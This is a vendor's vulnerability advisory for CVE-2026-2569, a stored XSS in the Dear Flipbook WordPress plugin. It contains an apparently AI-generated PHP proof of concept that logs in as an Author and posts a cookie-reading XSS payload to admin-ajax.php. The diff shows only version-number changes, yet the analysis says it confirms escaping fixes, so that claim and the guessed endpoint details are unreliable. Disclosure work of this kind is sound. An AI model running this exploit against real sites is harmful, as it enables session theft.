Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2569: Dear Flipbook <= 2.4.20 – Authenticated (Auhtor+) Stored Cross-Site Scripting via PDF Page Labels (3d-flipbook-dflip-lite)

CVE ID CVE-2026-2569
Plugin 3d-flipbook-dflip-lite
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 2.4.20
Patched Version 2.4.27
Disclosed March 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2569:
The vulnerability exists in the Dear Flipbook WordPress plugin versions up to and including 2.4.20. The root cause is insufficient input sanitization and output escaping for PDF page label data processed by the plugin’s AJAX handlers. Attackers with Author-level or higher privileges can inject arbitrary JavaScript payloads into page labels when uploading or modifying PDF flipbooks. The plugin stores these unsanitized values in the WordPress database. When a user views a compromised flipbook, the stored JavaScript executes in their browser context.

Exploitation occurs via the plugin’s AJAX endpoints, specifically through the ‘dearflip_upload_pdf’ and ‘dearflip_save_book’ actions handled by admin-ajax.php. The attacker sends a POST request containing malicious HTML/JavaScript within the ‘pageLabels’ parameter or embedded within a crafted PDF metadata field. The plugin processes this parameter without proper validation before storing it.

Atomic Edge research confirms the patch in version 2.4.27 implements proper output escaping using esc_html() or similar WordPress sanitization functions when rendering page labels. The version number change in the plugin header indicates the fix. The plugin now escapes all user-controlled data before output in frontend templates, preventing script execution while preserving label display functionality.

Successful exploitation allows authenticated attackers with Author privileges to perform stored XSS attacks. Injected scripts can steal session cookies, redirect users to malicious sites, or perform actions on behalf of authenticated users. The vulnerability requires Author-level access, limiting immediate impact, but compromised Author accounts could affect all site visitors viewing the malicious flipbook.

Differential between vulnerable and patched code

Code Diff 
--- a/3d-flipbook-dflip-lite/3d-flipbook-dflip-lite.php
+++ b/3d-flipbook-dflip-lite/3d-flipbook-dflip-lite.php
@@ -4,7 +4,7 @@
  * Plugin Name: 3D FlipBook : DearFlip Lite
  * Description: Realistic 3D Flip-books for WordPress <a href="https://dearflip.com/go/wp-lite-full-version" >Get Full Version Here</a><strong> NOTE : Deactivate this lite version before activating Full Version</strong>
  *
- * Version: 2.4.20
+ * Version: 2.4.27
  * Text Domain: 3d-flipbook-dflip-lite
  * Author: DearHive
  * Author URI: https://dearflip.com/go/wp-lite-author
@@ -45,7 +45,7 @@
      *
      * @var string
      */
-    public $version = '2.4.20';
+    public $version = '2.4.27';

     /**
      * The name of the plugin.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2569 - Dear Flipbook <= 2.4.20 - Authenticated (Author+) Stored Cross-Site Scripting via PDF Page Labels
<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'author_user';
$password = 'author_password';

// Step 1: Authenticate to WordPress and obtain nonce
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

// Create a session cookie jar
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_2569');

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $admin_url,
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Step 2: Extract the AJAX nonce from admin page
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=dearflip');
curl_setopt($ch, CURLOPT_POST, 0);
$admin_page = curl_exec($ch);

// Look for nonce in page (simplified - real implementation would parse HTML)
// Nonce is typically in a script tag or data attribute
preg_match('/"ajaxnonce"s*:s*"([a-f0-9]+)"/', $admin_page, $matches);
$ajax_nonce = $matches[1] ?? '';

// Step 3: Exploit the vulnerability via dearflip_upload_pdf action
// This simulates uploading a PDF with malicious page labels
$exploit_url = $target_url . '/wp-admin/admin-ajax.php';

$payload = json_encode([
    'pageLabels' => [
        '1' => 'Normal Page',
        '2' => '<img src=x onerror=alert(document.cookie)>', // XSS payload
        '3' => 'Another Page'
    ]
]);

curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'dearflip_upload_pdf',
    'nonce' => $ajax_nonce,
    'pdf_data' => $payload, // Contains malicious page labels
    'book_id' => 'new'
]));

$exploit_response = curl_exec($ch);
curl_close($ch);

// Clean up
unlink($cookie_file);

echo "Exploit attempt completed. Check response:n";
echo $exploit_response;

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School